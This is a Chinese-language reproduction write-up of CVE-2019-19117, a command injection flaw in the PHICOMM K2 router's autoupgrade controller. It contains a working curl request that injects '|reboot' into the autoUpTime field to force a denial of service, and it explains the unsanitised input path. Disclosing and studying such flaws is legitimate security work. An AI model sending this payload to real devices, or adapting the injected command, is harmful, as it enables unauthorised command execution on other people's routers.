(CVE-2019-19117)PHICOMM_远程代码执行

# (CVE-2019-19117)PHICOMM 远程代码执行

通过修改HTTP post请求中的内容,在根shell上远程执行命令。

## 二、漏洞影响

PHICOMM K2(PSG1218) V22.5.9.163

## 三、复现过程

受影响的源代码文件:/usr/lib/lua/luci/controller/admin/autoupgrade.lua

受影响的函数:save()

### 漏洞详情

首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权限后,向设备发送精心制作的数据包

“`
curl -i -s -k -v -X’POST’ -e “http://192.168.2.1/cgi-bin/luci/;stok=xxx/xxx/xxx/xxx” -b “sysauth=4a2c4bdba5fb1273ce62759fd42dba42” –data-binary “mode=1&autoUpTime=02%3A05|reboot” ‘http://192.168.2.1/cgi-bin/luci/;stok=xxx/admin/xxx/xxx/xxx’
“`

在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。

![image](/static/qingy/(CVE-2019-19117)PHICOMM_远程代码执行/img/1-20201014111731659.png)

我们可以看到,将’autoUpTime’的值直接分配给变量,而无需检查该值是否被恶意修改,然后发送给服务器。

![image](/static/qingy/(CVE-2019-19117)PHICOMM_远程代码执行/img/2-20201014111731659.png)

然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使攻击者想要执行的命令附加到该命令。

最后,路由器将执行命令“ reboot”,这将导致DoS。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容